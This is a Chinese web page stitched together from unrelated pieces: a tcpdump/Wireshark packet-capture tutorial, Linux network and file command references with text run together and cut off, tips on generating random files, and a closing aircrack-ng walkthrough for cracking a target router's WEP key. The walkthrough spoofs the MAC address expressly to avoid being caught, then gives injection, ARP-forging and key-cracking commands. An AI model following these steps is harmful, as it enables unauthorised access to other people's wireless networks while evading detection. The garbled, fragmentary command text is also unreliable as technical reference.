Linux 抓包命令 101：从初学者到网络专家的旅程 (linux抓包命令并生成文件)

什么是抓包？

抓包是网络监视的一种技术，它允许你捕获和检查网络上的数据包。数据包是网络中发送和接收信息的单位。它们包含有关发送方和接收方、数据类型以及数据本身的信息。

抓包对于解决网络问题、分析流量模式和检测安全漏洞非常有用。

tcpdump 命令

tcpdump 是 Linux 中最常见的抓包实用程序。它是一个强大的命令行工具，允许你捕获和过滤网络流量。要使用 tcpdump，你需要具有 root 权限。

以下是如何使用 tcpdump 捕获所有网络流量的示例命令：

tcpdump

要将捕获的数据保存到文件，可以使用 -w 选项。例如，以下命令将流量保存到名为 capture.pcap 的文件中：

tcpdump -w capture.pcap

要过滤特定类型的流量，可以使用 -i 和 -p 选项。例如，以下命令将仅捕获来自或发往 192.168.1.1 的流量：

tcpdump -i any -p host 192.168.1.1

Wireshark

Wireshark 是一个图形化的网络分析工具，可以用于捕获和分析网络流量。它比 tcpdump 更易于使用，并且提供了更广泛的功能。要使用 Wireshark，你需要安装它。你可以在 Wireshark 网站上找到安装说明。

一旦安装了 Wireshark，你可以通过在终端中输入以下命令来启动它：

wireshark

在 Wireshark 中，你可以使用菜单栏和工具栏来捕获和过滤流量。你还可以使用过滤器表达式来指定要捕获的特定类型的流量。有关 Wireshark 中过滤器表达式的更多信息，请参阅 Wireshark 用户指南。

生成文件

一旦你捕获了流量，就可以将其生成一个文件，以便以后分析。有许多不同的文件格式可供选择，最常见的是 PCAP（便携式数据采集包）格式。要将捕获生成 PCAP 文件，可以使用以下命令：

tcpdump -w capture.pcap

或者，你可以在 Wireshark 中通过转到菜单栏中的 File -> Save 来生成 PCAP 文件。

结论

抓包是网络监视和分析的强大工具。通过使用 tcpdump 或 Wireshark 等工具，你可以捕获、过滤和生成网络流量，以帮助你解决网络问题、分析流量模式和检测安全漏洞。

---

linux的网络命令大全linux的网络命令

Linux中使用ss命令检查网络连接的方法？

那个是远端机器上的端口，又不是你本机上的端口，可以用ss-p看看是哪个程序进行的连接，然后关闭这个程序。

linux有什么命令能够查看本机器的网络流量？

?nethogs:按进程查看流量占用?iptraf:按连接/端口查看流量?ifstat:按设备查看流量?ethtool:诊断工具?tcpdump:抓包工具希赛里有很多这方面资料的。

linux中网络配置可以有几种方法实现？

1.通过修改网络配置文件/etc/network/interfaces网络接口参数配置文件,下面是一个配置示例,有两个网络接口,其中eth0分配静态IP地址,eth1动态获取IP地址：#Thisfiledescribesthenetworkinterfacesavailableonyoursystem#,seeinterfaces(5).#Theloopbacknetworkinterfaceautoloifaceloinetloopback#Theprimarynetworkinterfaceautoeth0ifaceeth0inetstaticaddress192.168.1.254network192.168.1.0netmask255.255.255.0broadcast192.168.1.255gateway192.168.1.1autoeth1ifaceeth1inetdhcp修改完成后，需要重启网络设备#/etc/init.d/networkingrestart配置dns则修改/etc/文件。192.168.203.2配置hostname则是修改/etc/hosts127.0.0.1localhost127.0.0.1cobain配置完hostname后，可以用ping命令测试一下你的hostname是否已经通了。pingyourhostname这样就完成了一次网络配置所需要配置的ip信息，dsn信息，hostname信息等配置。但对于不同的linux来说，也许配置文件不同，上面在Ubuntu中做过测试。在redhat中有些不同。主机名和默认网关保存在/etc/sysconfig/network该文件中。而网络配置信息保存在网卡设备文件中/etc/sysconfig/network-scripts/ifcfg-ethn其中n是网卡的编号。DEVICE=eth0BOOTPROTO=staticBROADCAST=192.168.203.255IPADDR=192.168.203.2NETMASK=255.255.255.0NETWORK=192.168.203.9GATEWAY=192.168.203.1HOSTNAME=cobainONBOOT=yesTYPE=Ethernet貌似这里也可以修改hostname和默认网关。总之上面已经可以完成一次网络配置了。2.采用命令行配置只要是应用ifconfig命令。用于配置常驻内核的网络接口。它用于在引导成功时设定网络接口。此后，只在需要调试及系统调整时才使用。命令格式:ifconfigifconfig接口options|address...如没有给出参数，ifconfig显示当前有效接口的状态。如给定单个接口作为参数，它只显示给出的那个接口的状态；如果给出一个-a参数，它会显示所有接口的状态，包括那些停用的接口。否则就对一个接口进行配置。选项接口接口名称。通常是一个后跟单元号的驱动设备名，例如第一个以太接口eth0。up此选项激活接口。如果给接口声明了地址，等于隐含声明了这个选项。down此选项使接口驱动设备关闭。netmaskaddr为接口设定IP网络掩码。缺省值通常是A，B或C类的网络掩码(由接口的IP地址推出)，但也可设为其它值。addaddr/prefixlen为接口加入一个IPv6地址。deladdr/prefixlen为接口删除一个IPv6地址。hwclassaddress如接口驱动程序支持，则设定接口的硬件地址。此选项必须后跟硬件的类型名称和硬件地址等价的可打印ASCII字符。当前支持的硬件类型包括ether(以太网)，ax25(AMPRAX.25)，ARCnet和netrom(AMPRNET/ROM)利用ifconfig命令查看网络信息:ifconfigeth0Linkencap:EthernetHWaddr00:15:58:3E:F2:6Binetaddr:192.168.1.254Bcast:192.168.1.255Mask:255.255.255.0inet6addr:fe80::215:58ff:fe3e:f26b/64Scope:LinkUPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1RXpacketserrors:0dropped:0overruns:0frame:0TXpacketserrors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:1000RXbytes(10.4MiB)TXbytes(2.7MiB)Interrupt:169Baseaddress:0xe200eth0:0Linkencap:EthernetHWaddr00:15:58:3E:F2:6Binetaddr:192.168.1.244Bcast:192.168.1.255Mask:255.255.255.0UPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1Interrupt:169Baseaddress:0xe200loLinkencap:LocalLoopbackinetaddr:127.0.0.1Mask:255.0.0.0inet6addr:::1/128Scope:HostUPLOOPBACKRUNNINGMTUMetric:1RXpackets:354errors:0dropped:0overruns:0frame:0TXpackets:354errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:0RXbytes(44.0KiB)TXbytes(44.0KiB)ppp0Linkencap:Point-to-PointProtocolinetaddr:18.18.18.13P-t-P:18.18.18.1Mask:255.255.255.255UPPOINTOPOINTRUNNINGNOARPMULTICASTMTU:1396Metric:1RXpackets:9631errors:0dropped:0overruns:0frame:0TXpackets:9189errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:3RXbytes(8.0MiB)TXbytes(892.4KiB)ifconfig的第一种格式（或使用不带任何参数的ifconfig命令）可以用来查看当前系统的网络配置情况。*eth0：表示网卡代号*lo：Linux内部的网络回环地址,用于模拟网络行为,*HWaddr：网卡的硬件地址,也就是MAC地址*inetaddr：网卡的ip地址*Bcast：广播地址(broadcast)；*Mask：子网掩码；*MTU：最大传输单元的缩写(MaximumTrasmissionUnit),标示此网络接口的可传输的最大封包,此值的设定错误可能引起网络故障.*RX：网络从起动到现在为止数据的接收情况*TX：网络从起动到现在为止数据的发送情况*collisions：网络信号发生冲突的情况；激活网络设备ifconfigeth0up更改网络设备信息#ifconfigeth0192.168.1.112netmask255.255.255.0关闭网络设备ifconfigeth0down修改网卡的MAC地址ifconfigeth0downifconfigeth0hwetherxx:xx:xx:xx:xx:xxifconfigeth0up上面是对ifcofig命令一个简单的介绍。下面是进行网路配置的步骤：ifconfigeth0ip192.168.203.2netmask255.255.255.0然后重启ethoifconifgeth0downifconfigeth0up然后配置默认网关routeadddefaultgw192.168.203.1然后最好重启一下eth0修改hostname可以用命令hostnameyourhostname但重启后修改将无效。所以还是通过上面修改配置文件的方法修改hostname修改dns也是通过上述配置文件的方法进行。

linux命令大全详解？

在Linux系统中，提供了一套非常完备的命令，利用这些命令，我们可以更高效地完成所有的操作任务。

采用命令的方式进行操作的好处是，具有比图形化操作更加快捷高效的特点。但是命令方式不够直观，需要我们熟练记忆命令的用法、格式以及选项和参数等内容。只有我们通过不断地使用，才能运用自如。

一、Shell命令的格式

Shell命令是由命令和多个选项以及参数组成的命令行，各部分之间用空格分隔。重要的是，Shell命令是严格区分大小写的，所以，在使用Shell命令时一定要特别注意。

命令的一般格式如下：

命令名......

说明（小白请注意）：

”符号是为了表示一个部分，在编写命令时，不能带上这个符号。比如使用ls用法时，这样写ls是错的，正确写法应该是

同时，“符号里面的内容为可选（可写可不写）比如：ls，可以直接使用ls，也可以带上选项ls-s

二、基本命令

1、目录操作命令

命令名：ls

功能：列出当前目录下所有内容

格式：ls

选项及作用：

|选项|作用|

|-s|显示每个文件的大小|

|-S|按文件大小排序|

|-a|显示目录中全部文件（包括隐藏文件）|

|-l|使用长列表格式，显示文件详细信息|

|-t|按文件修改的时间排序|

|-F|显示文件类型描述符|

命令名：cd

功能：切换用户所在目录

格式：cd

特殊符号及作用：

|特殊符号|作用|

|/|从当前目录跳转到根目录|

|.|前往当前目录|

|..|前往上一级目录|

|-|前一目录，即进入当前目录之前操作的目录|

|~|回到当前用户的宿主目录|

命令名：pwd

功能：显示当前目录的绝对路径

格式：pwd

命令名：mkdir

功能：创建一个新的目录

格式：mkdir目录名

选项及作用：

|选项|作用|

|-m权限|对新建目录设置存取权限，权限有744、755等|

|-p|一次性创建多级目录（以递归形式创建）|

命令名：rmdir

功能：删除一个空目录

格式：rmdir目录名（-p代表递归删除各级目录）

2、文件操作命令

命令名：touch

功能：创建一个空文件

格式：touch文件名

命令名：cat

功能：显示某文件的内容

格式：cat...

选项及作用：

|选项|作用|

|-a|显示所有字符（换行符、制表符、其它非打印字符）|

|-n|对文件中所有的行进行编号并显示行号|

|-b|除了空行不编号，文件中其它行都进行编号并显示行号|

|-s|将连续的空行压缩为一个空行|

cat命令其它格式：

cat文件名|ls表示按页显示文件内容

cat文件名1;cat文件名2表示显示多个文件内容

cat此命令没有任何参数，即cat单独使用。在开始执行时，光标停留在下一行，等待键盘输入，当用户输入一行后，按下回车，就会显示一行相同的内容。当用户结束输入时，按下Ctrl+D键退出，回到命令提示符下。

cat>新文件名”>“这个大于号是重导向符号。代表把键盘输入的信息重导向输入到新文件中。内容输入结束后，同样也是按Ctrl+D键退出新文件的制作。

cat文件名1文件名2>文件名3该用法实现了把文件1和文件2的内容合并输入到文件3中。文件3中的内容是按文件1和文件2的顺序排列的。

cat文件名2>>文件名1该用法实现了把文件2的全部内容追加到文件1的末尾。

命令名：cp

功能：进行文件的复制

格式：cp源文件目标路径

选项及作用：

|选项|作用|

|-i|以安全询问方式进行源文件的复制|

说明：该命令实现了把源文件复制到目标路径中，文件名不变。如果为目标路径下的文件名，则以文件的重命名方式实现文件的复制。目标路径可以是相对路径，也可以是绝对路径。

命令名：rm

功能：删除指定的文件

格式：rm文件名或目录名

选项及作用：

|选项|作用|

|-i|以安全询问方式进行删除文件|

|-r|递归处理，将指定目录下的所有文件及子目录一并处理|

|-f|强制删除文件或目录|

|-v|显示指令执行过程|

命令名：mv

功能：移动指定的文件

格式：mv文件名路径名

命令名：chmod

功能：修改文件的权限和属性

格式：chmod文件名1文件名2...

注：作为一个部分，中间不加空格。

文件使用者有（u、g、o、a）4种类型，在使用时，可以采用其中的任何一个，也可以组合使用。

u：表示user（文件主），就是文件或目录的所有者

g：表示group（组群），文件主所在组群的用户

o：表示other，其他用户

a：表示all，所有用户

操作符号有3种类型，分别是+、-、=。

+：表示增加权限

-：表示删除或取消权限

=：表示赋予给定的权限给文件使用者，并取消其他权限（如果有的话）

权限类型有3种基本类型，分别是r、w、x，这些类型可以组合使用。

r：代表可读权限

w：代表可写权限

x：代表可执行权限

选项及作用：

|选项|作用|

|a+rw|为所有用户增加可读、可写的权限|

|g+w|为组群用户可写权限|

|a-rwx|取消所有用户可读、可写、可执行权限|

|o-rwx|取消其他用户可读、可写、可执行权限|

|a+rw|为所有用户增加读、写的权限|

|ug+r|为所有者和组群用户增加读权限|

|g=rx|只允许组群用户可读、可执行，并删除其他权限|

|自定义|可以根据实际需要进行组合|

chmod命令的其他格式

格式如下：

chmod文件名

mode是指3个0~7范围的八进制数值，分别代表user、group、other的权限。

其实，我们也可以用数字来表示权限：

0表示没有权限，1表示可执行权限，2表示可写权限，4表示可读权限。

举例：

chmoda=rwxfilename

chmod777filename

对以上的两个例子分析：

a=rwx表示允许所有用户可读、可写、可执行。

777指三个八进制数值，前面提到了，分别代表的是user、group、other的权限，即第一个数字”7“指允许user的可读、可写、可执行，第二个数字”7“指允许group的可读、可写、可执行，第三个数字”7“指允许other的可读、可写、可执行。

所以，这两个例子效果是一样的。

懵逼了，”7“怎么就指可读、可写、可执行了呢？

rwx权限=4+2+1=7（可读、可写、可执行）

rw权限=4+2=6（可读、可写）

rx权限=4+1=5（可读、可执行）

再举个例子：

chmodug=rwx,o=xfilename

chmod771filename

这两个效果也是相同的。

3、文件处理命令

命令名：grep

功能：在指定的文件中查找指定的字符串

格式：grep关键字文件名

选项及作用：

|选项|作用|

|-i|不区分大小写|

命令名：head

功能：查看文件开头部分的内容

格式：head文件名

数字选项及作用：

|数字选项|作用|

|-3|显示文件前3行的内容|

|-5|显示文件前5行的内容|

|-n|显示文件前n行的内容|

说明：如果不指定数字选项，即使用命令grep文件名，则默认只显示文件前10行。

命令名：tail

功能：查看文件结尾部分的内容

格式：tail文件名

数字选项及作用：

|数字选项|作用|

|-3|显示文件末尾3行的内容|

|-5|显示文件末尾5行的内容|

|-n|显示文件末尾n行的内容|

说明：如果不指定数字选项，即使用命令tail文件名，则默认只显示文件末尾10行的内容。

命令名：wc

功能：统计文件的行数、单词数、字符数。

格式：wc文件名

选项及作用：

|选项|作用|

|-l|显示文件的行数|

|-w|显示文件的单词数|

|-m|显示文件的字符数|

命令名：sort

功能：对文件内容或查询结果进行排序

格式：sort文件名

选项及作用：

|选项|作用|

|-f|忽略大小写|

|-r|反向排序|

|-t|指定分隔符|

|-i|只考虑可以打印的字符，忽略任何非显示字符|

命令名：find

功能：查找文件或目录

格式：find文件名或目录名

命令名：which

功能：按PATH变量所规定的路径进行查找相应的命令，并显示该命令的绝对路径。

格式：which命令名

4、压缩备份命令

命令名：bzip2

功能：压缩文件

格式：bzip2文件名1...

说明：使用该命令对文件进行压缩后，压缩前的原始文件消失，系统会生成一个新的压缩文件，压缩文件的后缀为2。而且，使用该命令压缩的文件，必须用bunzip2来进行解压操作。

命令名：bunzip2

功能：解压文件

格式：bunzip2文件名1...

命令名：gzip

功能：压缩或解压文件

格式：gzip文件名

选项及作用：

|选项|作用|

|-d|解压操作|

|-n|指定压缩级别，n的范围是1~9|

命令名：unzip

功能：解压以为后缀的压缩文件

格式：unzip文件

选项及作用：

|选项|作用|

|-d|将文件解压到指定目录中|

|-n|不覆盖原来已存在的文件|

|-v|查看文件目录列表但不解压|

|-o|已默认方式覆盖已存在的文件|

举例-d/home/ubuntu将文件解压到/home/ubuntu目录中。

命令名：zcat和bzcat

功能：这两个都是用来查看压缩文件内容的，压缩文件不用解压也能查看。

格式：zcat文件名或bzcat文件名

命令名：tar

功能：对文件或目录进行打包或解包操作

格式：tar

选项及作用：

|选项|作用|

|-c|创建新的打包文件|

|-t|查看打包文件里的文件目录|

|-f|使用文件或设备|

|-v|显示打包压缩或解包压缩后的文件的详细清单|

|-x|抽取文件的内容|

|-z|打包后直接用gzip命令进行压缩或解压文件|

|-j|打包后直接用bzip2命令进行压缩或解压文件|

5、磁盘操作命令

命令名：df

功能：查看当前硬盘的分区信息

格式：df

选项及作用：

|选项|作用|

|-a|显示每个文件系统和各分区的磁盘使用情况|

|-i|显示i节点的使用量|

|-k|以千字节（KB）的方式显示分区大小和挂上来的文件分区大小|

|-h|以兆字节（MB）的方式显示分区大小和挂上来的文件分区大小|

|-t|列出某个文件系统的所有分区磁盘空间使用量|

命令名：du

功能：查看当前目录下所有文件及目录信息

格式：du

选项及作用：

|选项|作用|

|-a|显示所有文件及目录的大小|

|-h|以兆字节（MB）或吉字节（GB）为单位显示文件或目录的大小|

|-b|以字节（B）为单位显示文件或目录的大小|

|-s|列出各文件大小的总和|

命令名：fsck

功能：对硬盘进行检测

格式：fsck分区名

6、关机重启命令

命令名：shutdown

功能：安全关机

格式：shutdown

选项及作用：

|选项|作用|

|-h|将系统服务停掉后再安全关机|

|-t|在规定的时间后关机|

|-k|没有真正关机，只

如何在Linux系统通过命令行生成随机文件

A、当你不需要关心随机文件的内容，只需一个固定大小的文件 1、Solaris、Mac OS X等Unix系统中mkfile指令，可以产生指定大小的文件，而Linux上则没有 例子：mkfile -n 160g test12、Linux可以用dd指令，/dev/zero是一个特别的文件描述符可以通过它返回null值 例子：dd if=/dev/zero of= count=1024 bs=1024 产生count * bs字节的文件，1M 此方法生成随机文件的好处在于效率高（产生1G文件大概1s）,创建的文件大小精确到字节 坏处也有 使用null字符来填充文件内容，文件统计时没有行（wc -l 为0） B、当你不需要关心随机文件的内容，但期望测试文件能有统计的行 将/dev/zero改为/dev/urandom，/dev/urandom是linux下的随机数生成器 关于/dev/urandom跟/dev/random两者的区别就不在此详细讨论，大概就是，前者是不受系统interrupts的限制，即使没有足够的interrupt它也能通过随机数生成器产生足够的输出值；而后者如果用在dd上，它不能被ctrl+c或者kill -9中断，如果ds的值较大时，产生的随机值不足而长期占用CPU。 虽然说/dev/random产生的随机数会更随机些，但与dd混用还是建议用/dev/urandom效率更高。 缺点跟/dev/zero比当然是效率会更低些了，生成个100Mb的文件需要10秒左右，而且文件并没有可读的内容，一般的情况基本上是满足了。 漏了说句，dd是linux与unix都支持的指令。 C、当你关心文件的随机内容行数，而不关心内容是否有所重复 这里的思路就是找一个参照文件（比如说2行），将文件重新定向到新的文件，再mv覆盖保存，外加一个for循环。 （n为循环次数，产生的文件行为2^（n+1）） 例子:假设先建立一个文件，里面含有Hello 和 World两行 for i in {1..n}; do cat > && mv ; done 由于是阶乘，n=20左右已经是200W行，效率会下降地比较厉害 D、当你关心随机文件的内容，而不想出现重复内容行情况 这种情况下系统的指令应该是不能满足了，或者可以通过操作系统的指令写一大串脚本也可以达到，但不建议这么做，因为可读性和维护性考虑，你应该要引入Ruby或者Python类的脚本语言帮忙了 但还是要借助些系统的东西来帮忙 思路： /usr/share/dict/words里面有记录一些单词，一共行，每行一个单词 可以从里面挑选一些作为文件的内容 加循环达到我们想要的随机文件要求 举例： ruby -e a=; do; b=[]; do; b<<a[rand()] end; puts ( ) < /usr/share/dict/words > X为随机文件需要的行数，Y为从words中读取的单词，虽说组合成一句的命令，还是可以读懂的；从标准输入中重复读取Y个单词，写入到b列表中，然后再通过join空格连接内容写入到标准输出文件中 这样基本很少会有重复的行了，而且生成的效率与其他方法对比还是可以的，10秒生成100Mb文件。 欢迎大家讨论。

airodump-ng linux下怎样抓包

Aircrack-ng系列工具也有Windows 平台版本，但是本人的小黑的始终不能在win下抓包，所以只能 弃 Windows从Linux 了，另外 Windows下扫描到的 AP 也比 Linux 下少了很多。 其实 Windows并不完整的支持 TCP/IP 协议族，有些协议Windows直接丢弃不用。 网络本来从一开始就是 Unix 的天下，Windows只是在后来加入了网络的功能。 Aircrack-ng工具包有很多工具，我用到的工具主要有以下几个：airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包，干扰另外还要用到以下 linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造 MACiwconfig 主要针对无线网卡的工具 (同 ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的 linux 基本命令，我就不提示了。 具体破解步骤：1. 修改无线网卡状态：先 dow2. 伪造无线网卡的 MAC 地址：安全起见，减少被抓到的可能3. 修改网卡工作模式：进入Monitor状态，会产生一个虚拟的网卡4. 修改无线网卡状态： up5. 查看网络状态，记录下 AP 的 MAC 和本机的 MAC ，确定攻击目标6. 监听抓包：生成 或 7. 干扰无线网络：截取无线数据包，发送废品数据包，用来获得更多的有效数据包8. 破解 或 ，获得 WEP 密码，完成破解Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0，ath0等等ifconfig -aifconfig -a ath0 upairmon-ng start wifi0 6airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1airodump-ng ath1aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1----------- -2 Crack Mode-----------aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1----------- -3 Crack Mode-----------aireplay-ng -3 -b 目标MAC -h 本机MAC ath1----------- -4 Crack Mode-----------aireplay-ng -4 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1----------- -5 Crack Mode-----------aireplay-ng -5 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1-----------Crack Key-----------aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件——————————————————————————————　下面详细介绍一下各个命令的基本用法（参照命令的英文说明）1. ifconfig用来配置网卡，我们这里主要用来 禁用和启用 网卡：ifconfig ath0 downifconfig ath0 up禁用一下网卡的目的是为了下一步修改 MAC 。 用来改变网卡的 MAC 地址，具体用法如下：usage: macchanger [options] device-h 显示帮助-V 显示版本-s 显示当前MAC-e 不改变mac,使用硬件厂商写入的MAC-a 自动生成一个同类型的MAC，同厂商的-A 自动生成一个不同类型的MAC，不同厂商的-r 生成任意MAC-l 显示已知厂商的网卡MAC地址分配，这个很有用，可以根据MAC查出来是哪个厂商生产的产品-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 -ng启动无线网卡进入 Monitor 模式，useage: airmon-ng <start|stop|check> <interface> [channel]<start|stop|check>启动，停止，检测<interface>指定无线网卡[channel] 监听频道，现代大多数无线路由默认是 6，随便扫描一下都是这个频道，网管们应该换换了专用的无线网卡配置工具，用来配置特殊的网络信息，不带参数时显示可用网络。 useage：iwconfig interface [options][essid{NN|ON|OFF}] 指定essid号 开启关闭[nwid{NN|on|off}] 指定网络id号 开启关闭[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型[freq [K|M|G]] 指定工作频率[channel N] 指定频道[ap {N|off|auto}] 指定AP号 关闭/自动[sens N] sens 号[nick N] nick 号[rate {N|auto|fixed}] 速率控制[rts {N|auto|fixed|off}] rts控制，如果不知道什么是RTS，那就回去好好去学网络，不用往下看了[frag {N|auto|fixed|off}] 碎片控制[enc {NNNN-NNNN|off}] 范围[power {period N|timeout N}] 电源 频率/超时[retry {limit N|lifetime N}] 重试 限次/超时[txpower N{mw|dBm}] 功率 毫瓦/分贝[commit] 处理主要用来显示无线网卡的一些附加信息,同上useage: iwlist [interface] optionsscanning 扫描frequency 频率channel 频道bitrate 速率rate 速率encryption 加密key 密钥power 电源txpower 功率ap apaccespoints appeers 直连event 事件-ng抓包工具,我最喜欢用的,详细用法如下:usage: airodump-ng <options> <interface>[,<interface>,...]Options:--ivs :仅将抓取信息保存为 --gpsd :使用 GPSd--write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分-w :同 --write--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的--update <secs> :显示更新延迟,没有用过--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了-h :隐藏已知的,配合上面的选项使用-f <msecs> :跳频时间--berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)-r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵Filter options:--encrypt <suite> : 使用密码序列过滤 AP--netmask <netmask> : 使用掩码过滤 AP--bssid <bssid> : 使用 bssid 过滤 AP-a : 过滤无关的客户端默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:--channel <channels>:指定频道--band <abg> :制定带宽-C <frequencies> :指定频率MHz--cswitch <method> : 设置频道交换方式0 : FIFO (default) 先进先出(默认)1 : Round Robin 循环2 : Hop on last 最后一跳-s : 同上--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文-ng

若对本页面资源感兴趣，请点击下方或右方图片，注册登录后

搜索本页相关的【资源名】【软件名】【功能词】或有关的关键词，即可找到您想要的资源

如有其他疑问，请咨询右下角【在线客服】，谢谢支持！